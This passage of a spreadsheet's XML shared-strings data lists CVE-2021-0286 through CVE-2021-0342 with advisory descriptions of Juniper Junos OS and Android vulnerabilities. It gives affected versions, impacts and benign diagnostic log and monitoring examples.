to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R1-S1, 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-0286</t>
  </si>
  <si>
    <t>A vulnerability in the handling of exceptional conditions in Juniper Networks Junos OS Evolved (EVO) allows an attacker to send specially crafted packets to the device, causing the Advanced Forwarding Toolkit manager (evo-aftmand-bt or evo-aftmand-zx) process to crash and restart, impacting all traffic going through the FPC, resulting in a Denial of Service (DoS). Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. Following messages will be logged prior to the crash: Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:35 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:37 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:19241453497049 label:1089551617 for session:18 probe:44 Feb 2 10:14:39 fpc0 evo-aftmand-bt[16263]: [Error] Nexthop: Failed to get fwd nexthop for nexthop:32710470974358 label:1089551617 for session:18 probe:47 Feb 2 10:14:39 fpc0 audit[16263]: ANOM_ABEND auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=11 Feb 2 10:14:39 fpc0 kernel: audit: type=1701 audit(1612260879.272:17): auid=4294967295 uid=0 gid=0 ses=4294967295 pid=16263 comm="EvoAftManBt-mai" exe="/usr/sbin/evo-aftmand-bt" sig=1 This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1 versions prior to 21.1R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0287</t>
  </si>
  <si>
    <t>In a Segment Routing ISIS (SR-ISIS)/MPLS environment, on Juniper Networks Junos OS and Junos OS Evolved devices, configured with ISIS Flexible Algorithm for Segment Routing and sensor-based statistics, a flap of a ISIS link in the network, can lead to a routing process daemon (RPD) crash and restart, causing a Denial of Service (DoS). Continued link flaps will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 19.4 versions prior to 19.4R1-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S1, 20.1R3; 20.2 versions prior to 20.2R2-S2, 20.2R3; 20.3 versions prior to 20.3R2; Juniper Networks Junos OS Evolved: 20.3-EVO versions prior to 20.3R2-EVO; 20.4-EVO versions prior to 20.4R2-EVO. This issue does not affect: Juniper Networks Junos OS releases prior to 19.4R1. Juniper Networks Junos OS Evolved releases prior to 19.4R1-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0288</t>
  </si>
  <si>
    <t>A vulnerability in the processing of specific MPLS packets in Juniper Networks Junos OS on MX Series and EX9200 Series devices with Trio-based MPCs (Modular Port Concentrators) may cause FPC to crash and lead to a Denial of Service (DoS) condition. Continued receipt of this packet will sustain the Denial of Service (DoS) condition. This issue only affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). This issue affects Juniper Networks Junos OS on MX Series, EX9200 Series: 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R2-S2, 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R2;</t>
  </si>
  <si>
    <t>CVE-2021-0289</t>
  </si>
  <si>
    <t>When user-defined ARP Policer is configured and applied on one or more Aggregated Ethernet (AE) interface units, a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability between the Device Control Daemon (DCD) and firewall process (dfwd) daemons of Juniper Networks Junos OS allows an attacker to bypass the user-defined ARP Policer. In this particular case the User ARP policer is replaced with default ARP policer. To review the desired ARP Policers and actual state one can run the command "show interfaces &lt;&gt; extensive" and review the output. See further details below. An example output is: show interfaces extensive | match policer Policer: Input: __default_arp_policer__ &lt;&lt;&lt; incorrect if user ARP Policer was applied on an AE interface and the default ARP Policer is displayed Policer: Input: jtac-arp-ae5.317-inet-arp &lt;&lt;&lt; correct if user ARP Policer was applied on an AE interface For all platforms, except SRX Series: This issue affects Juniper Networks Junos OS: All versions 5.6R1 and all later versions prior to 18.4 versions prior to 18.4R2-S9, 18.4R3-S9 with the exception of 15.1 versions 15.1R7-S10 and later versions; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2; This issue does not affect Juniper Networks Junos OS versions prior to 5.6R1. On SRX Series this issue affects Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.4 versions prior to 19.4R3-S4; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3-S2; 20.3 version 20.3R1 and later versions; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. This issue does not affect 18.4 versions prior to 18.4R1 on SRX Series. This issue does not affect Junos OS Evolved.</t>
  </si>
  <si>
    <t>CVE-2021-0290</t>
  </si>
  <si>
    <t>Improper Handling of Exceptional Conditions in Ethernet interface frame processing of Juniper Networks Junos OS allows an attacker to send specially crafted frames over the local Ethernet segment, causing the interface to go into a down state, resulting in a Denial of Service (DoS) condition. The interface does not recover on its own and the FPC must be reset manually. Continued receipt and processing of these frames will create a sustained Denial of Service (DoS) condition. This issue is platform-specific and affects the following platforms and line cards: * MPC7E/8E/9E and MPC10E on MX240, MX480, MX960, MX2008, MX2010, and MX2020 * MX204, MX10003, MX10008, MX10016 * EX9200, EX9251 * SRX4600 No other products or platforms are affected by this vulnerability. An indication of this issue occurring can be seen in the system log messages, as shown below: user@host&gt; show log messages | match "Failed to complete DFE tuning" fpc4 smic_phy_dfe_tuning_state: et-4/1/6 - Failed to complete DFE tuning (count 3) and interface will be in a permanently down state: user@host&gt; show interfaces et-4/1/6 terse Interface Admin Link Proto Local Remote et-4/1/6 up down et-4/1/6.0 up down aenet --&gt; ae101.0 This issue affects Juniper Networks Junos OS: 16.1 versions prior to 16.1R7-S7 on MX Series; 17.1R1 and later versions prior to 17.2R3-S3 on MX Series; 17.3 versions prior to 17.3R3-S8 on MX Series; 17.4 versions prior to 17.4R2-S11, 17.4R3-S1 on MX Series, SRX4600; 18.1 versions prior to 18.1R3-S10 on MX Series, EX9200 Series, SRX4600; 18.2 versions prior to 18.2R3-S3 on MX Series, EX9200 Series, SRX4600; 18.3 versions prior to 18.3R3-S1 on MX Series, EX9200 Series, SRX4600; 18.4 versions prior to 18.4R2-S3, 18.4R3 on MX Series, EX9200 Series, SRX4600; 19.1 versions prior to 19.1R2-S1, 19.1R3 on MX Series, EX9200 Series, SRX4600; 19.2 versions prior to 19.2R1-S3, 19.2R2 on MX Series, EX9200 Series, SRX4600; 19.3 versions prior to 19.3R2 on MX Series, EX9200 Series, SRX4600. This issue does not affect Juniper Networks Junos OS versions prior to 16.1R1.</t>
  </si>
  <si>
    <t>CVE-2021-0291</t>
  </si>
  <si>
    <t>An Exposure of System Data vulnerability in Juniper Networks Junos OS and Junos OS Evolved, where a sensitive system-level resource is not being sufficiently protected, allows a network-based unauthenticated attacker to send specific traffic which partially reaches this resource. A high rate of specific traffic may lead to a partial Denial of Service (DoS) as the CPU utilization of the RE is significantly increased. The SNMP Agent Extensibility (agentx) process should only be listening to TCP port 705 on the internal routing instance. External connections destined to port 705 should not be allowed. This issue affects: Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2; 20.3 versions prior to 20.3R2. Juniper Networks Junos OS Evolved versions prior to 20.3R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 13.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-0292</t>
  </si>
  <si>
    <t>An Uncontrolled Resource Consumption vulnerability in the ARP daemon (arpd) and Network Discovery Protocol (ndp) process of Juniper Networks Junos OS Evolved allows a malicious attacker on the local network to consume memory resources, ultimately resulting in a Denial of Service (DoS) condition. Link-layer functions such as IPv4 and/or IPv6 address resolution may be impacted, leading to traffic loss. The processes do not recover on their own and must be manually restarted. Changes in memory usage can be monitored using the following shell commands (header shown for clarity): user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 59.0 0.7 *5702564* 247952 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 user@router:/var/log# ps aux | grep arpd USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 31418 49.1 1.0 *5813156* 351184 ? xxx /usr/sbin/arpd --app-name arpd -I object_select --shared-objects-mode 3 Memory usage can be monitored for the ndp process in a similar fashion: user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5614052* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje user@router:/var/log# ps aux | grep ndp USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 14935 0.0 0.1 *5725164* 27256 ? Ssl Jun15 0:17 /usr/sbin/ndp -I no_tab_chk,object_select --app-name ndp --shared-obje This issue affects Juniper Networks Junos OS Evolved: 19.4 versions prior to 19.4R2-S3-EVO; 20.1 versions prior to 20.1R2-S4-EVO; all versions of 20.2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 19.4R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0293</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS caused by Missing Release of Memory after Effective Lifetime leads to a memory leak each time the CLI command 'show system connections extensive' is executed. The amount of memory leaked on each execution depends on the number of TCP connections from and to the system. Repeated execution will cause more memory to leak and eventually daemons that need to allocate additionally memory and ultimately the kernel to crash, which will result in traffic loss. Continued execution of this command will cause a sustained Denial of Service (DoS) condition. An administrator can use the following CLI command to monitor for increase in memory consumption of the netstat process, if it exists: user@junos&gt; show system processes extensive | match "username|netstat" PID USERNAME PRI NICE SIZE RES STATE C TIME WCPU COMMAND 21181 root 100 0 5458M 4913M CPU3 2 0:59 97.27% netstat The following log message might be observed if this issue happens: kernel: %KERN-3: pid 21181 (netstat), uid 0, was killed: out of swap space This issue affects Juniper Networks Junos OS 18.2 versions prior to 18.2R2-S8, 18.2R3-S7. 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S7; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S1; 19.4 versions prior to 19.4R1-S4, 19.4R2-S3, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2-S1, 20.2R3; 20.3 versions prior to 20.3R1-S1, 20.3R2; This issue does not affect Juniper Networks Junos OS versions prior to 18.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-0294</t>
  </si>
  <si>
    <t>A vulnerability in Juniper Networks Junos OS, which only affects the release 18.4R2-S5, where a function is inconsistently implemented on Juniper Networks Junos QFX5000 Series and EX4600 Series, and if "storm-control enhanced" is configured, can lead to the enhanced storm control filter group not be installed. It will cause storm control not to work hence allowing an attacker to cause high CPU usage or packet loss issues by sending a large amount of broadcast or unknown unicast packets arriving the device. This issue affects Juniper Networks QFX5100, QFX5110, QFX5120, QFX5200, QFX5210, EX4600, and EX4650, and QFX5100 with QFX 5e Series image installed. QFX5130 and QFX5220 are not affected from this issue. This issue affects Juniper Networks Junos OS 18.4R2-S5 on QFX5000 Series and EX4600 Series. No other product or platform is affected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-0295</t>
  </si>
  <si>
    <t>A vulnerability in the Distance Vector Multicast Routing Protocol (DVMRP) of Juniper Networks Junos OS on the QFX10K Series switches allows an attacker to trigger a packet forwarding loop, leading to a partial Denial of Service (DoS). The issue is caused by DVMRP packets looping on a multi-homed Ethernet Segment Identifier (ESI) when VXLAN is configured. DVMRP packets received on a multi-homed ESI are sent to the peer, and then incorrectly forwarded out the same ESI, violating the split horizon rule. This issue only affects QFX10K Series switches, including the QFX10002, QFX10008, and QFX10016. Other products and platforms are unaffected by this vulnerability. This issue affects Juniper Networks Junos OS on QFX10K Series: 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 version 18.2R1 and later versions; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S9, 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S7, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L</t>
  </si>
  <si>
    <t>CVE-2021-0296</t>
  </si>
  <si>
    <t>The Juniper Networks CTPView server is not enforcing HTTP Strict Transport Security (HSTS). HSTS is an optional response header which allows servers to indicate that content from the requested domain will only be served over HTTPS. The lack of HSTS may leave the system vulnerable to downgrade attacks, SSL-stripping man-in-the-middle attacks, and weakens cookie-hijacking protections. This issue affects Juniper Networks CTPView: 7.3 versions prior to 7.3R7; 9.1 versions prior to 9.1R3.</t>
  </si>
  <si>
    <t>CVE-2021-0297</t>
  </si>
  <si>
    <t>A vulnerability in the processing of TCP MD5 authentication in Juniper Networks Junos OS Evolved may allow a BGP or LDP session configured with MD5 authentication to succeed, even if the peer does not have TCP MD5 authentication enabled. This could lead to untrusted or unauthorized sessions being established, resulting in an impact on confidentiality or stability of the network. This issue affects Juniper Networks Junos OS Evolved: All versions prior to 20.3R2-S1-EVO; 20.4 versions prior to 20.4R2-EVO; 21.1 versions prior to 21.1R2-EVO. Juniper Networks Junos OS is not affected by this issue.</t>
  </si>
  <si>
    <t>CVE-2021-0298</t>
  </si>
  <si>
    <t>A Race Condition in the 'show chassis pic' command in Juniper Networks Junos OS Evolved may allow an attacker to crash the port interface concentrator daemon (picd) process on the FPC, if the command is executed coincident with other system events outside the attacker's control, leading to a Denial of Service (DoS) condition. Continued execution of the CLI command, under precise conditions, could create a sustained Denial of Service (DoS) condition. This issue affects all Juniper Networks Junos OS Evolved versions prior to 20.1R2-EVO on PTX10003 and PTX10008 platforms. Junos OS is not affected by this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-0299</t>
  </si>
  <si>
    <t>An Improper Handling of Exceptional Conditions vulnerability in the processing of a transit or directly received malformed IPv6 packet in Juniper Networks Junos OS results in a kernel crash, causing the device to restart, leading to a Denial of Service (DoS). Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue only affects systems with IPv6 configured. Devices with only IPv4 configured are not vulnerable to this issue. This issue affects Juniper Networks Junos OS: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2. This issue does not affect Juniper Networks Junos OS versions prior to 19.4R1.</t>
  </si>
  <si>
    <t>CVE-2021-0301</t>
  </si>
  <si>
    <t>In ged, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android SoC; Android ID: A-172514667.</t>
  </si>
  <si>
    <t>CVE-2021-0302</t>
  </si>
  <si>
    <t>In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782</t>
  </si>
  <si>
    <t>CVE-2021-0303</t>
  </si>
  <si>
    <t>In dispatchGraphTerminationMessage() of packages/services/Car/computepipe/runner/graph/StreamSetObserver.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-170407229.</t>
  </si>
  <si>
    <t>CVE-2021-0304</t>
  </si>
  <si>
    <t>In several functions of GlobalScreenshot.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure of the user's contacts with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-8.0, Android-8.1, Android-9; Android ID: A-162738636.</t>
  </si>
  <si>
    <t>CVE-2021-0305</t>
  </si>
  <si>
    <t>In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-154015447</t>
  </si>
  <si>
    <t>CVE-2021-0306</t>
  </si>
  <si>
    <t>In addAllPermissions of PermissionManagerService.java, there is a possible permissions bypass when upgrading major Android versions which allows an app to gain the android.permission.ACTIVITY_RECOGNITION permission without user confirmation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-154505240.</t>
  </si>
  <si>
    <t>CVE-2021-0307</t>
  </si>
  <si>
    <t>In updatePermissionSourcePackage of PermissionManagerService.java, there is a possible automatic runtime permission grant due to a confused deputy. This could lead to local escalation of privilege allowing a malicious app to silently gain access to a dangerous permission with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Android ID: A-155648771.</t>
  </si>
  <si>
    <t>CVE-2021-0308</t>
  </si>
  <si>
    <t>In ReadLogicalParts of basicmbr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158063095.</t>
  </si>
  <si>
    <t>CVE-2021-0309</t>
  </si>
  <si>
    <t>In onCreate of grantCredentialsPermissionActivity, there is a confused deputy. This could lead to local information disclosure and account access with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-158480899.</t>
  </si>
  <si>
    <t>CVE-2021-0310</t>
  </si>
  <si>
    <t>In LazyServiceRegistrar of LazyServiceRegistrar.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-170212632.</t>
  </si>
  <si>
    <t>CVE-2021-0311</t>
  </si>
  <si>
    <t>In ElementaryStreamQueue::dequeueAccessUnitH264() of ESQueue.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170240631.</t>
  </si>
  <si>
    <t>CVE-2021-0312</t>
  </si>
  <si>
    <t>In WAVSource::read of WAVExtractor.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-170583712.</t>
  </si>
  <si>
    <t>CVE-2021-0313</t>
  </si>
  <si>
    <t>In isWordBreakAfter of LayoutUtils.cpp, there is a possible way to slow or crash a TextView due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-10, Android-11, Android-8.0, Android-8.1; Android ID: A-170968514.</t>
  </si>
  <si>
    <t>CVE-2021-0314</t>
  </si>
  <si>
    <t>In onCreate of UninstallerActivity, there is a possible way to uninstall an all without informed user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-171221302</t>
  </si>
  <si>
    <t>CVE-2021-0315</t>
  </si>
  <si>
    <t>In onCreate of GrantCredentialsPermissionActivity.java, there is a possible way to convince the user to grant an app access to an account due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.1, Android-9, Android-10, Android-11, Android-8.0; Android ID: A-169763814.</t>
  </si>
  <si>
    <t>CVE-2021-0316</t>
  </si>
  <si>
    <t>In avrc_pars_vendor_cmd of avrc_pars_tg.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11, Android-8.0, Android-8.1, Android-9, Android-10; Android ID: A-168802990.</t>
  </si>
  <si>
    <t>CVE-2021-0317</t>
  </si>
  <si>
    <t>In createOrUpdate of Permission.java and related code, there is possible permission escalation due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-10, Android-11, Android-8.0, Android-8.1, Android-9; Android ID: A-168319670.</t>
  </si>
  <si>
    <t>CVE-2021-0318</t>
  </si>
  <si>
    <t>In appendEventsToCacheLocked of SensorEventConnection.cpp, there is a possible out of bounds write due to a use-after-free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-9, Android-8.1, Android-10, Android-11; Android ID: A-168211968.</t>
  </si>
  <si>
    <t>CVE-2021-0319</t>
  </si>
  <si>
    <t>In checkCallerIsSystemOr of CompanionDeviceManagerService.java, there is a possible way to get a nearby Bluetooth device's MAC address without appropriate permissions due to a permissions bypass. This could lead to local escalation of privilege that grants access to nearby MAC addresses, with User execution privileges needed. User interaction is needed for exploitation. Product: Android; Versions: Android-8.0, Android-8.1, Android-9, Android-10, Android-11; Android ID: A-167244818.</t>
  </si>
  <si>
    <t>CVE-2021-0320</t>
  </si>
  <si>
    <t>In is_device_locked and set_device_locked of keystore_keymaster_enforcement.h, there is a possible bypass of lockscreen requirements for keyguard bound keys due to a race condition. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-10, Android-11; Android ID: A-169933423.</t>
  </si>
  <si>
    <t>CVE-2021-0321</t>
  </si>
  <si>
    <t>In enforceDumpPermissionForPackage of ActivityManagerService.java, there is a possible way to determine if a package is installed due to side channel information disclosure. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-166667403.</t>
  </si>
  <si>
    <t>CVE-2021-0322</t>
  </si>
  <si>
    <t>In onCreate of SlicePermissionActivity.java, there is a possible misleading string displayed due to improper input validation. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation.Product: Android; Versions: Android-10, Android-11, Android-9; Android ID: A-159145361.</t>
  </si>
  <si>
    <t>CVE-2021-0324</t>
  </si>
  <si>
    <t>Product: AndroidVersions: Android SoCAndroid ID: A-175402462</t>
  </si>
  <si>
    <t>CVE-2021-0325</t>
  </si>
  <si>
    <t>In ih264d_parse_pslice of ih264d_parse_pslice.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-174238784</t>
  </si>
  <si>
    <t>CVE-2021-0326</t>
  </si>
  <si>
    <t>In p2p_copy_client_info of p2p.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution if the target device is performing a Wi-Fi Direct search, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172937525</t>
  </si>
  <si>
    <t>CVE-2021-0327</t>
  </si>
  <si>
    <t>In getContentProviderImpl of ActivityManagerService.java, there is a possible permission bypass due to non-restored binder identities. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-172935267</t>
  </si>
  <si>
    <t>CVE-2021-0328</t>
  </si>
  <si>
    <t>In onBatchScanReports and deliverBatchScan of GattService.java, there is a possible way to retrieve Bluetooth scan results without permissions due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-172670415</t>
  </si>
  <si>
    <t>CVE-2021-0329</t>
  </si>
  <si>
    <t>In several native functions called by AdvertiseManager.java, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the Bluetooth server with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-171400004</t>
  </si>
  <si>
    <t>CVE-2021-0330</t>
  </si>
  <si>
    <t>In add_user_ce and remove_user_ce of storaged.cpp, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in storaged with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-170732441</t>
  </si>
  <si>
    <t>CVE-2021-0331</t>
  </si>
  <si>
    <t>In onCreate of NotificationAccessConfirmationActivity.java, there is a possible overlay attack due to an insecure default value. This could lead to local escalation of privilege and notification access with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-170731783</t>
  </si>
  <si>
    <t>CVE-2021-0332</t>
  </si>
  <si>
    <t>In bootFinished of SurfaceFlinger.cpp, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-169256435</t>
  </si>
  <si>
    <t>CVE-2021-0333</t>
  </si>
  <si>
    <t>In onCreate of BluetoothPermissionActivity.java, there is a possible permissions bypass due to a tapjacking overlay that obscures the phonebook permissions dialog when a Bluetooth device is connecting. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-168504491</t>
  </si>
  <si>
    <t>CVE-2021-0334</t>
  </si>
  <si>
    <t>In onTargetSelected of ResolverActivity.java, there is a possible settings bypass allowing an app to become the default handler for arbitrary domains. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-163358811</t>
  </si>
  <si>
    <t>CVE-2021-0335</t>
  </si>
  <si>
    <t>In process of C2SoftHevcDec.cpp, there is a possible out of bounds write due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-160346309</t>
  </si>
  <si>
    <t>CVE-2021-0336</t>
  </si>
  <si>
    <t>In onReceive of BluetoothPermissionRequest.java, there is a possible permissions bypass due to a mutable PendingIntent. This could lead to local escalation of privilege that bypasses a permission check, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-158219161</t>
  </si>
  <si>
    <t>CVE-2021-0337</t>
  </si>
  <si>
    <t>In moveInMediaStore of FileSystemProvider.java, there is a possible file exposure due to stale metadata. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-157474195</t>
  </si>
  <si>
    <t>CVE-2021-0338</t>
  </si>
  <si>
    <t>In SystemSettingsValidators, there is a possible permanent denial of service due to missing bounds checks on UI settings. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-156260178</t>
  </si>
  <si>
    <t>CVE-2021-0339</t>
  </si>
  <si>
    <t>In loadAnimation of WindowContainer.java, there is a possible way to keep displaying a malicious app while a target app is brought to the foreground. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-8.1 Android-9Android ID: A-145728687</t>
  </si>
  <si>
    <t>CVE-2021-0340</t>
  </si>
  <si>
    <t>In parseNextBox of IsoInterface.java, there is a possible leak of unredacted location information due to improper input validation. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-134155286</t>
  </si>
  <si>
    <t>CVE-2021-0341</t>
  </si>
  <si>
    <t>In verifyHostName of OkHostnameVerifier.java, there is a possible way to accept a certificate for the wrong domain due to improperly used crypto. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-171980069</t>
  </si>
  <si>
    <t>CVE-2021-0342</t>
  </si>
  <si>
